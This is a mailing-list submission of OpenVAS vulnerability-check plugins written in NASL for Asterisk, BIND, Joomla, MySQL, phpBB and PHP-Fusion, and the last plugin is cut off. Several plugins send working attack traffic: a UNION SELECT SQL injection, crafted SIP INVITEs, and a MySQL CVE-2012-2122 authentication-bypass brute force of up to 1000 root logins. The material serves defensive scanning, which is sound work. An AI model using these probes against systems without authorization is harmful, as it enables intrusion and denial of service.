Dear all,
We have modified our plugins submitted yesterday based on the advice from Jan, and added three new plugins.

Note:
nopsec_mysql_auth_bypass.nasl: This plugin has to attempt to log in to MySQL with a random password up to 1000 times, i.e. it is a brute-force check. At present it sends a login packet to the MySQL server containing the capability flags, charset ("lang"), user name and password, and inspects the response to see whether the login was accepted. get_kb_item('mysql/'+port+'/lang') is one of the calls we took from the internet, but Jan has pointed out that this KB key may not be set in OpenVAS. Is there a replacement for it, or a better way to log in to MySQL?

Attachment content:
2 asterisk (new), 1 joomla (new), 2 MySQL, 1 PHP, 1 PHPBB, 1 PHPMyAdmin, 1 DNS
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_asterisk_ast_2012_006.nasl 110018 
#2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012) $
#
# SIP channel driver in Asterisk suffers remote crash vulnerability
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################


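if (description)
{
  script_id(110018);
  script_version("$Revision: 1.0 $");
  # The timestamp tags and script_name were split over two lines by the
  # mail client's wrap; each literal is restored to a single line.
  script_tag(name:"last_modification", value:"$Date: 2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012) $");
  script_tag(name:"creation_date", value:"2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012)");

  script_cve_id("CVE-2012-2416");
  script_bugtraq_id(53205);
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"risk_factor", value:"Medium");
  script_name("SIP channel driver in Asterisk suffers remote crash vulnerability");
  script_summary("Check the version in SIP banner.");

  script_description(
"Description:
chan_sip.c in the SIP channel driver in Asterisk Open Source 1.8.x before 
1.8.11.1 and 10.x before 10.3.1 and Asterisk Business Edition C.3.x before 
C.3.7.4, when the trustrpid option is enabled, allows remote authenticated 
users to cause a denial of service (daemon crash) by sending a SIP UPDATE 
message that triggers a connected-line update attempt without an associated 
channel.
Recommendation:
Upgrade to 1.8.11.1 / 10.3.1 / C.3.7.4 or versions after.");

  # Pure version check: no traffic beyond what the detection script sends.
  script_category(ACT_GATHER_INFO);
  script_family("General");
  script_copyright("This script is Copyright NopSec Inc.");
  # Supplies the "Asterisk-PBX/Ver" KB entry consumed below.
  script_dependencies("secpod_asterisk_detect.nasl");
  script_require_keys("Services/udp/sip");
  exit(0);
}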
include("version_func.inc");

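# Use the SIP port found by the scan and fall back to 5060. The original
# overwrote the KB value unconditionally with 4569 (the IAX2 port), so the
# detected SIP port was never used and the finding was attached to the wrong
# port.
port = get_kb_item("Services/udp/sip");
if(!port) port = 5060;
if(!get_udp_port_state(port)) exit(0);

version_asterisk = get_kb_item("Asterisk-PBX/Ver");
if(!version_asterisk) exit(0);

vulnerable = FALSE;

# Open Source branches: fixed in 1.8.11.1 and 10.3.1. version_in_range() is
# inclusive at both ends, so the original also reported the fixed releases;
# the upper bound must be exclusive.
if(version_is_greater_equal(version:version_asterisk, test_version:"1.8") &&
   version_is_less(version:version_asterisk, test_version:"1.8.11.1"))
{
  vulnerable = TRUE;
}
else if(version_is_greater_equal(version:version_asterisk, test_version:"10") &&
        version_is_less(version:version_asterisk, test_version:"10.3.1"))
{
  vulnerable = TRUE;
}
else
{
  # Business Edition C.3.x: fixed in C.3.7.4. The original regex flagged
  # every C.3 build, including patched ones; compare the numeric part after
  # "C.3." instead. A bare "C.3" with no further component is treated as
  # pre-fix.
  be = eregmatch(pattern:"^C\.3(\.([0-9.]+))?([^0-9]|$)", string:version_asterisk);
  if(!isnull(be))
  {
    if(isnull(be[2]) || strlen(be[2]) == 0 ||
       version_is_less(version:be[2], test_version:"7.4"))
    {
      vulnerable = TRUE;
    }
  }
}

if(vulnerable)
{
  # NOTE(review): the banner cannot show whether trustrpid is enabled or
  # whether an attacker holds SIP credentials; both are preconditions in the
  # advisory text above, so this is a version-based finding only.
  security_warning(port:port, proto:"udp");
  exit(0);
}
exit(0);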

##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_asterisk_sip_auth_bypass.nasl 110019 
#2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012) $
#
# Asterisk SIP remote auth bypass
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################


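if (description)
{
  script_id(110019);
  script_version("$Revision: 1.0 $");
  # Timestamp tags were split across lines by the mail wrap; restored.
  script_tag(name:"last_modification", value:"$Date: 2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012) $");
  script_tag(name:"creation_date", value:"2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012)");

  script_cve_id("CVE-2008-1332");
  script_bugtraq_id(28310);
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"risk_factor", value:"Medium");

  script_name("Asterisk SIP remote auth bypass");
  script_summary("Empty From header in invite message");

  script_description(
"Description:
Certain version of Asterisk installed on the remote host allows remote  
attackers to access the SIP channel driver via a crafted From header.
 Recommendation:
 Upgrade to Asterisk 1.2.27 / 1.4.18.1 / 1.4.19-rc3 / 1.6.0-beta6,
 Asterisk Business Edition B.2.5.1 / C.1.6.2, AsteriskNOW 1.0.2,
 Asterisk Appliance Developer Kit 1.4 revision 109393, s800i (Asterisk
 Appliance) 1.1.0.2 or later.");

  # Sends crafted INVITEs to the target, so it is an active test.
  script_category(ACT_ATTACK);
  script_family("General");
  script_copyright("This script is Copyright NopSec Inc.");

  # Supplies "sip/banner/<port>" used to confirm the target is Asterisk.
  script_dependencies("sip_detection.nasl");
  script_require_keys("Services/udp/sip");
  exit(0);
}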


include("global_settings.inc");


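port = get_kb_item("Services/udp/sip");
if (!port) port = 5060;
if (!get_udp_port_state(port)) exit(0);

# Only Asterisk is affected; bail out unless the SIP banner says so.
banner = get_kb_item(strcat("sip/banner/", port));
if (!banner || "Asterisk" >!< banner) exit(0);

# Send one request and return the first response datagram, or NULL when no
# socket could be opened. A source port of 5060 is used for remote targets
# because some SIP stacks ignore requests from other ports.
function sip_exchange(port, data)
{
  local_var soc, res;
  if (islocalhost()) soc = open_sock_udp(port);
  else soc = open_priv_sock_udp(sport:5060, dport:port);
  if (!soc) return NULL;
  send(socket:soc, data:data);
  res = recv(socket:soc, length:1024);
  close(soc);
  return res;
}

# Return the status line(s) ("SIP/2.0 xxx ...") of a response, "" if none.
function sip_status(res)
{
  if (isnull(res)) return "";
  return egrep(pattern:"^SIP/", string:res);
}

sdp = string(
    "v=0\r\n",
    "o=myhost 12345 12345 IN IP4 ", get_host_name(), "\r\n",
    "c=IN IP4 ", get_host_name(), "\r\n",
    "m=audio 16384 RTP/AVP 8 0 18 101\r\n",
    "a=rtpmap:0 PCMU/8000");

# The original request was malformed: the request line lacked " SIP/2.0",
# the Via header carried no branch parameter, and a stray "To: <sip:host"
# fragment (holding the branch) preceded the From header. Besides making the
# first INVITE invalid, that extra "To:" broke the blank-From rewrite below,
# which locates the headers with strstr().
invite = string(
    "INVITE sip:", get_host_name(), " SIP/2.0\r\n",
    "Via: SIP/2.0/UDP ", this_host(), ":", port,
      ";branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport\r\n",
    'From: "', SCRIPT_NAME, '" <sip:nopsec@', this_host(), ':', port,
      '>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672\r\n',
    'To: <sip:nopsec@', get_host_ip(), ':', port, '>\r\n',
    "Call-ID: ", rand(), "\r\n",
    'CSeq: 1 INVITE\r\n',
    "Contact: <sip:nopsec@", this_host(), ">\r\n",
    "Max-Forwards: 70\r\n",
    'Subject: ', SCRIPT_NAME, '\r\n',
    "Content-Type: application/sdp\r\n",
    "Content-Length: ", strlen(sdp), "\r\n\r\n",
    sdp);

# Step 1: a normal INVITE from an unknown peer must be refused with 403;
# otherwise guests are allowed anyway and the test is meaningless.
res1 = sip_exchange(port:port, data:invite);
if (isnull(res1)) exit(0);
if (!ereg(pattern:"^SIP/[0-9]\.[0-9] 403 ", string:sip_status(res:res1))) exit(0);

# Step 2: resend the same INVITE with an empty From header and a bumped CSeq.
# ("a - b" removes the first occurrence of b from a.)
invite2 = invite - strstr(invite, 'From: ') + 'From: \r\n' + strstr(invite, 'To: ');
invite2 = ereg_replace(pattern:"CSeq: 1 ", replace:"CSeq: 2 ", string:invite2);

res2 = sip_exchange(port:port, data:invite2);
if (isnull(res2)) exit(0);

# Any response other than 400/401/403 means the empty From header was not
# rejected for lack of credentials.
accepted = "^SIP/[0-9]\.[0-9] ([1235-9][0-9][0-9]|4(0[24-9]|[1-9][0-9])) ";
if (ereg(pattern:accepted, string:sip_status(res:res2)))
{
  # The service is UDP; without proto: the result is filed under TCP/port.
  security_hole(port:port, proto:"udp");
  exit(0);
}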
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_dns_amplification.nasl 11006 
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# Spoofed request DNS server DOS attack
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################



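if(description)
{
  script_id(11006);
  script_version("$Revision: 1.0 $");
  script_cve_id("CVE-2006-0987");
  # Tag values and the summary were split across lines by the mail wrap;
  # each literal is restored to a single line.
  script_tag(name:"last_modification", value:"$Date: 2012-06-15 13:18:22 +0200 (Thu, 14 Jun 2012) $");
  script_tag(name:"creation_date", value:"2012-06-15 13:15:22 +0200 (Thu, 14 Jun 2012)");
  script_tag(name:"cvss_base", value:"6.4");
  script_tag(name:"risk_factor", value:"High");
  script_name("Spoofed request DNS server DOS attack");
  script_description(
"Description:
When ISC BIND configured as a caching name server, allows recursive queries and 
provides additional delegation information to arbitrary IP addresses. The 
remote attackers could perform a DOS attack via DNS queries with spoofed source 
IP addresses. Specifically is to check whether response message is more than 
twice bigger than sent message (for name server record).
Recommendation:
restrict access to DNS server");

  script_summary("cause a denial of service via DNS queries with spoofed source IP addresses");
  # One ordinary query is sent; nothing is spoofed by the scanner itself.
  script_category(ACT_GATHER_INFO);
  script_copyright("This script is Copyright NopSec Inc.");
  script_family("Denial of Service");
  script_dependencies("dns_server.nasl");
  script_require_keys("DNS/udp/53");
  exit(0);
}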

include("global_settings.inc");
include("network_func.inc");
include("byte_func.inc");


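if (! COMMAND_LINE && ! get_kb_item("DNS/udp/53")) exit(0);
port = 53;
if (! get_udp_port_state(port)) exit(0);

# Query "." IN NS (the root name servers) with the RD bit set. The
# description targets servers that answer recursive queries for anyone, but
# the original sent flags 0x0010 (that is the CD bit; RD is 0x0100), so it
# never asked for recursion and measured a reply served from root hints.
qid = rand() & 0xffff;
FLAG_RD = 0x0100;

header = raw_string(qid >> 8, qid & 0xff,
                    FLAG_RD >> 8, FLAG_RD & 0xff,
                    0, 1,      # QDCOUNT
                    0, 0,      # ANCOUNT
                    0, 0,      # NSCOUNT
                    0, 0);     # ARCOUNT
question = raw_string(0,       # QNAME: the root label "."
                      0, 2,    # QTYPE  NS
                      0, 1);   # QCLASS IN
query = header + question;

soc = open_sock_udp(port);
if (!soc) exit(0);
send(socket:soc, data:query);
answer = recv(socket:soc, length:4096);
close(soc);

# Only measure a datagram that is actually the response to our query:
# at least a full header, matching transaction ID, QR bit set.
if (isnull(answer) || strlen(answer) < 12) exit(0);
if (((ord(answer[0]) << 8) | ord(answer[1])) != qid) exit(0);
if (!(ord(answer[2]) & 0x80)) exit(0);

# Amplification criterion kept from the original: answer more than twice
# the size of the query.
if (2 * strlen(query) < strlen(answer))
{
  txt = strcat('\nThe DNS query was ', strlen(query), ' bytes long, the answer is ', strlen(answer), ' bytes long.\n');
  security_warning(port: 53, proto: "udp", data: txt);
  if (COMMAND_LINE) display(txt);
}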

##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_joomla_ignitegallery_gallery_sql_injection.nasl 110020 
#2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012) $
#
# Joomla index.php gallery parameter suffers SQL injection
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################


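if (description)
{
  script_id(110020);
  script_version("$Revision: 1.0 $");
  # Timestamp tags were split across lines by the mail wrap; restored.
  script_tag(name:"last_modification", value:"$Date: 2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012) $");
  script_tag(name:"creation_date", value:"2012-06-19 11:43:12 +0100 (Tue, 19 Jun 2012)");
  script_cve_id("CVE-2008-6182");
  script_bugtraq_id(31714);
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"risk_factor", value:"Medium");

  script_name("Joomla index.php gallery parameter suffers SQL injection");
  script_summary("SQL Injection vulnerability in ignite gallery");

  script_description(
"Description:
Allows remote attackers to execute arbitrary SQL commands via the gallery 
parameter in a view action to index.php.
Recommendation:
Upgrade Ignite Gallery to version 0.8.3.2 or later." );

  # Sends a UNION SELECT payload to the target, so it is an active test.
  script_category(ACT_ATTACK);
  script_copyright("This script is Copyright NopSec Inc.");
  script_family("Web application abuses");
  # Supplies the Joomla install directory read via get_dir_from_kb().
  script_dependencies("joomla_detect.nasl");
  script_require_ports("Services/www", 80);
  script_require_keys("joomla/installed");
  exit(0);
}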

include("global_settings.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("version_func.inc");


port = get_http_port(default:80);
if (!port) exit(0);
dir_joomla = get_dir_from_kb(port:port, app:"joomla");
if (!dir_joomla) exit(0);

# Marker we expect to find reflected in the page if the UNION executes.
marker = string(SCRIPT_NAME, " Bang!");

# Encode the marker as concat(0x.., 0x.., ...) so the URL needs no quotes.
hexparts = "";
for (k = 0; k < strlen(marker); k++)
{
  if (k > 0) hexparts += ",";
  hexparts += hex(ord(marker[k]));
}
payload = string("-1+UNION+SELECT+1,2,concat(", hexparts, "),4,5,6,7,8,9,10+--+");

url = string(dir_joomla, "/index.php?option=com_ignitegallery&task=view&gallery=", payload);
req = http_get(item:url, port:port);
body = http_send_recv(port:port, data:req, bodyonly:TRUE);
if (!body) exit(0);

# Require both the reflected marker and a sign that Ignite Gallery rendered
# the page, so an unrelated echo of the payload is not reported.
if (marker >< body && "components/com_ignitegallery" >< body)
{
  security_warning(port);
  exit(0);
}
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_mysql_5_1_41.nasl 11003 
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# MySQL version 5.1 < 5.1.41 contains several Vulnerabilities
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################


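if (description)
{
  script_id(11003);
  script_version("$Revision: 1.0 $");
  # Timestamp tags were split across lines by the mail wrap; restored.
  script_tag(name:"last_modification", value:"$Date: 2012-06-14 13:18:22 +0200 (Thu, 14 Jun 2012) $");
  script_tag(name:"creation_date", value:"2012-06-14 13:15:22 +0200 (Thu, 14 Jun 2012)");
  script_tag(name:"cvss_base", value:"6.4");
  script_tag(name:"risk_factor", value:"High");
  script_cve_id("CVE-2008-2079", "CVE-2009-4019", "CVE-2009-4028", "CVE-2009-4030");
  script_bugtraq_id(37075, 37076, 37297);

  script_name("MySQL version 5.1 < 5.1.41 contains several Vulnerabilities");
  script_summary("Check the version of MySQL");

  # NOTE(review): the recommended target "5.56" does not look like a MySQL
  # release number; the fixed release named in the title is 5.1.41.
  script_description("
Description:
check if the version of MySQL 5.1 installed on the remote host is earlier than 
5.1.41 which include multiple vulnerabilities such as crafted SELECT statement 
crashing server and man-in-the-middle attacks.
Recommendation:
Upgrade MySQL to 5.56 or versions after.");

  # Banner/version check only.
  script_category(ACT_GATHER_INFO);
  script_family("Databases");

  script_copyright("This script is Copyrighted by NopSec Inc.");

  script_dependencies("mysql_version.nasl");
  script_require_ports("Services/mysql", 3306);

  exit(0);
}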
include("misc_func.inc");
include("version_func.inc");
include("global_settings.inc");

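mysql_port = get_kb_item("Services/mysql");
if(!mysql_port) mysql_port = 3306;
if(!get_tcp_port_state(mysql_port)) exit(0);

mysql_version = get_mysql_version(port:mysql_port);
if(isnull(mysql_version)) exit(0);

# Keep only the dotted numeric prefix (drops suffixes such as "-log").
m = eregmatch(pattern:"([0-9.]+)", string:mysql_version);
if(isnull(m)) exit(0);
current_mysql_version = m[0];

# This check covers the 5.1 branch only (see script_name). A plain
# "less than 5.1.41" test also reported every 5.0.x and 4.x server, including
# 5.0.x builds that received their own fixes for these CVEs.
if(version_is_greater_equal(version:current_mysql_version, test_version:"5.1") &&
   version_is_less(version:current_mysql_version, test_version:"5.1.41"))
{
  security_hole(port:mysql_port);
}
exit(0);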
         
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_mysql_auth_bypass.nasl 110016 
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# MySQL authentication bypass (CVE-2012-2122)
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################


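if (description)
{
  script_id(110016);
  script_version("$Revision: 1.0 $");
  # Timestamp tags were split across lines by the mail wrap; restored.
  script_tag(name:"last_modification", value:"$Date: 2012-06-18 13:18:22 +0200 (Thu, 14 Jun 2012) $");
  script_tag(name:"creation_date", value:"2012-06-18 13:15:22 +0200 (Thu, 14 Jun 2012)");
  script_cve_id("CVE-2012-2122");
  script_tag(name:"risk_factor", value:"High");

  script_name("MySQL auth bypass");
  script_summary("Brute force to bypass MySQL login auth");
  script_description(
"
Description:
the vulnerability is rooted in function of memcmp() which may return a value 
out of range (-127,127). there is a 1 in 256 chance that ANY password would be 
accepted for authentication.
Recommendation:
Upgrade MySQL to the latest version.
");

  # This test performs hundreds of root login attempts against the target;
  # it is an attack, not passive information gathering, and must be ordered
  # (and skippable) as such.
  script_category(ACT_ATTACK);
  script_family("Databases");

  script_copyright("This script is Copyright NopSec Inc.");

  script_dependencies("mysql_version.nasl");
  script_require_ports("Services/mysql", 3306);

  exit(0);
}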

include("global_settings.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("byte_func.inc");

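# Brute-force verification of CVE-2012-2122. Each attempt is a fresh TCP
# connection carrying a protocol-4.1 login for "root" with an arbitrary
# 20-byte authentication token. On a vulnerable build the out-of-range
# memcmp() result makes the server accept roughly 1 token in 256, so a
# success within MAX_ATTEMPTS (P ~ 98% at 1000 tries) is conclusive; a
# failure is not.
#
# Defects fixed relative to the first version: the socket was UDP
# (open_sock_udp) although MySQL is TCP; the server's handshake was never
# read before sending the login; the packet header was prepended again on
# every iteration so the payload grew each time; the loop ran 10 times, not
# 1000; and a "no vulnerability" line was printed even after a hit.
#
# This is intrusive: it leaves MAX_ATTEMPTS failed root logins in the server
# log and may trip host blocking (max_connect_errors) for the scanner host,
# so it is skipped when safe checks are enabled.
if (safe_checks()) exit(0);

port = get_kb_item("Services/mysql");
if (!port) port = 3306;
if (!get_tcp_port_state(port)) exit(0);

MAX_ATTEMPTS = 1000;
USER = "root";

# Client capabilities this script actually implements:
#   CLIENT_LONG_PASSWORD (0x0001) | CLIENT_PROTOCOL_41 (0x0200) |
#   CLIENT_SECURE_CONNECTION (0x8000).
# A fixed set replaces the 'mysql/<port>/caps' KB lookup, which is not
# guaranteed to be populated in OpenVAS (it masked to 0 when missing).
CLIENT_CAPS = 0x8201;

# Character set for the login; the KB key is optional, so default to
# utf8_general_ci (33) when it is absent.
lang = get_kb_item('mysql/' + port + '/lang');
if (isnull(lang) || lang == 0) lang = 33;

# 4-byte little-endian integer. Built by hand so the result does not depend
# on whatever byte order byte_func.inc's mkdword() is currently set to.
function le32(v)
{
  return raw_string(v & 0xff, (v >> 8) & 0xff, (v >> 16) & 0xff, (v >> 24) & 0xff);
}

# Wrap a payload in a MySQL packet: 3-byte little-endian length + sequence id.
function mysql_packet(seq, payload)
{
  local_var n;
  n = strlen(payload);
  return raw_string(n & 0xff, (n >> 8) & 0xff, (n >> 16) & 0xff, seq & 0xff) + payload;
}

# Protocol-4.1 handshake response:
#   caps(4) max_packet(4) charset(1) reserved(23) user NUL token_len(1) token
function mysql_login_payload(caps, lang, user, token)
{
  return le32(v:caps) + le32(v:0xFFFF) + raw_string(lang & 0xff) +
         crap(data:raw_string(0), length:23) +
         user + raw_string(0) +
         raw_string(strlen(token) & 0xff) + token;
}

found = FALSE;
for (attempt = 1; attempt <= MAX_ATTEMPTS && !found; attempt++)
{
  # The server closes the connection after a failed login, so reconnect.
  soc = open_sock_tcp(port);
  if (!soc) break;

  # The server speaks first: handshake packet, payload byte 0 = protocol
  # version 10. Anything else (e.g. an ERR packet because this host is
  # blocked or not allowed) means further attempts are pointless.
  greeting = recv(socket:soc, length:4096);
  if (isnull(greeting) || strlen(greeting) < 5 || ord(greeting[4]) != 10)
  {
    close(soc);
    break;
  }

  # 20 arbitrary bytes; for this bug the token's content is irrelevant.
  token = SHA1(string(rand(), "-", attempt));
  login = mysql_login_payload(caps:CLIENT_CAPS, lang:lang, user:USER, token:token);
  send(socket:soc, data:mysql_packet(seq:1, payload:login));
  res = recv(socket:soc, length:4096);
  close(soc);

  if (isnull(res) || strlen(res) < 5) continue;

  # Result packet: first payload byte 0x00 = OK, 0xFF = ERR. Only an OK
  # packet counts; the original treated any reply without "Access denied"
  # as success, which would also fire on unrelated server errors.
  if (ord(res[4]) == 0)
  {
    report = string("The MySQL server accepted a login for user '", USER,
                    "' with an arbitrary authentication token after ", attempt,
                    " attempt(s); the password check can be bypassed (CVE-2012-2122).");
    security_warning(port:port, data:report);
    found = TRUE;
  }
}
exit(0);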
##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_phpbb_2022.nasl 110017 
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# phpbb version < 2.0.22 suffers multiple vulnerabilities
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################


if (description)
{
  script_id(110017);
  script_version("$Revision: 1.0 $");

  script_cve_id("CVE-2006-4758", "CVE-2006-6421", "CVE-2006-6839", "CVE-2006-6840", "CVE-2006-6841");
  script_bugtraq_id(20347, 21806, 22001);

  script_name("phpbb version < 2.0.22 suffers multiple vulnerabilities");
  script_summary("Tries to pass a 'bad' redirect in via phpBB");

  script_description(
"Description:
phpbb version < 2.0.22 suffers XSS attack which allows remote authenticated 
users to inject arbitrary web script or HTML via the 'Message body' field in a 
message to a non-existent user.
Recommendation:
Upgrate phpbb to 2.0.22 or versions after." );

  # Posts to login.php on the target, so it is an active test.
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("This script is Copyright NopSec Inc.");
  # Supplies the "www/<port>/phpBB" KB entry ("<version> under <dir>").
  script_dependencies("phpbb_detect.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

install = get_kb_item(string("www/", port, "/phpBB"));
if (isnull(install)) exit(0);

# KB value is "<version> under <dir>"; only the directory is needed.
parts = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (isnull(parts)) exit(0);
dir = parts[2];

login_url = string(dir, "/login.php");
req = http_get(port:port, item:login_url);
page = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);

# Make sure this really is the phpBB login form before posting to it.
if (!page || 'form action="login.php?sid=' >!< page) exit(0);

# Post an empty login with a redirect value no real page would use; a
# vulnerable phpBB echoes it back unfiltered inside the meta refresh.
bad_redirect = string("/", SCRIPT_NAME, ";url=", unixtime());
postdata = string("username=&password=&redirect=", bad_redirect, "&login=Log+in");

req = http_post(port:port, item:login_url, data:postdata);
page = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);

expected = string('refresh" content="3;url=login.php?redirect=', bad_redirect, '">');
if (page && expected >< page)
{
  security_hole(port:port);
  exit(0);
}

##############################################################################
# OpenVAS Vulnerability Test
# $Id: nopsec_php_fusion_extract_sql_injections.nasl 110014 
#2012-06-18 11:43:12 +0100 (Mon, 18 Jun 2012) $
#
# Variable overwriting vulnerability in PHP fusion
#
# Authors:
# Songhan Yu <[email protected]>
#
# Copyright:
# This script is Copyright NopSec Inc., http://www.nopsec.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################


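if (description)
{
  script_id(110014);
  script_version("$Revision: 1.0 $");
  # Timestamp tags were split across lines by the mail wrap; restored.
  script_tag(name:"last_modification", value:"$Date: 2012-06-14 13:18:22 +0200 (Thu, 14 Jun 2012) $");
  script_tag(name:"creation_date", value:"2012-06-14 13:15:22 +0200 (Thu, 14 Jun 2012)");
  script_tag(name:"cvss_base", value:"6.4");
  script_tag(name:"risk_factor", value:"High");

  script_cve_id("CVE-2006-4673");
  script_bugtraq_id(19908, 19910);

  script_name("Variable overwriting vulnerability in PHP fusion");
  script_summary("Overwrite $_SERVER[REMOTE_ADDR] with PHP-Fusion");

  script_description(
" Description:
The remote host fails to restrict the variables that could be registered, 
attackers can make use of this flaw to generate multiple attacks on affected 
application.
 Recommendation:
None yet." );

  # Sends a SQL injection probe to news.php, so it is an active test.
  script_category(ACT_ATTACK);
  script_family("Web application abuses");

  script_copyright("This script is Copyright NopSec Inc.");

  # NOTE(review): the body reads "www/<port>/php-fusion", which a generic
  # PHP detection script may not set; a PHP-Fusion detection dependency
  # would be the natural provider — confirm which script populates it.
  script_dependencies("gb_php_detect.nasl");
  script_require_ports("Services/www", 80);
  script_require_keys("php/installed");
  exit(0);
}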

include("global_settings.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");


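port = get_http_port(default:80);
if(!get_port_state(port)) exit(0);

install = get_kb_item(string("www/", port, "/php-fusion"));
if(isnull(install)) exit(0);

# KB value is "<version> under <dir>"; only the directory is needed.
m = eregmatch(pattern:"^(.+) under (/.*)$", string:install);
if(isnull(m)) exit(0);
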